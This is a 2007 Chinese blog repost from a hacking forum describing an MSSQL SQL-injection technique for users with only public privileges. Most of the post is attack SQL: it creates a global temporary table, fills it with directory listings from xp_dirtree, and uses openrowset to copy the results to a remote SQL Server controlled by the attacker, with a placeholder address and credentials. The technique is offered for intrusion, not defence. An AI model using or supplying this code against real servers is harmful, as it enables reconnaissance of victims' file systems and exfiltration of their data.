数据加载中……


 

 登   陆

我的分类(专题)
数据加载中……

链接

Blog信息
数据加载中……

 



MSSQL注入PUBLIC权限下的xp_dirtree再度利用(带视频动画)[
樱木花盗 发表于 2007-8-12 1:53:00
文章作者:kj021320
信息来源:邪恶八进制信息安全团队(www.eviloctal.com)

注意:本文章首发I.S.T.O技术团队,后由原创作者友情提交到邪恶八进制信息安全团队论坛。

本来这文章在TEAM里面放了好久的了!只是<>的一个小部分,可惜写了好久资料收集了好多但是估计年底都没能出来~那就先发出来了!主要是MSSQL2005都来了!2K的话没多久就会给淘汰了~拿出来跟大家交流吧~广告说完了...

正文:

提起public权限的用户估计很多人也觉得郁闷了吧~N久以前看了一篇《论在mssql中public和db_owner权限下拿到webshell或是系统权限》的文章(名字真长-_-!!!),里面说到没办法利用xp_regread,xp_dirtree…这些存储过程,原因是public没有办法建表,我在这里矫正一下其实public是可以建表的~呵呵,使这些存储过程能利用上,看下面的代码吧

--建立一个临时表,一般的表我们是无办法建立的,我们只能建立临时表

create table ##nonamed(

      dir ntext,

      num int

)


--调用存储过程把执行回来的数据存到临时表里面

insert ##nonamed execute master..xp_dirtree 'c:\',1


--然后采用openrowset函数把临时表的数据导到本地MSSQL 的dirtree表里面了

insert into openrowset('sqloledb', '192.0.0.1';'user';'pass', 'select * from Northwind.dbo.dirtree')

select * from ##nonamed


以上方法,也就是说public可以遍历用户服务器的目录 具体有什么利用价值嘛~呵呵见仁见智了
MSSQLPUBLIC.rar

阅读全文 | 回复(0) | 引用通告 | 编辑
 


发表评论:

    昵称:
    密码: (游客无须输入密码)
    主页:
    标题:
    数据加载中……


Powered by Oblog.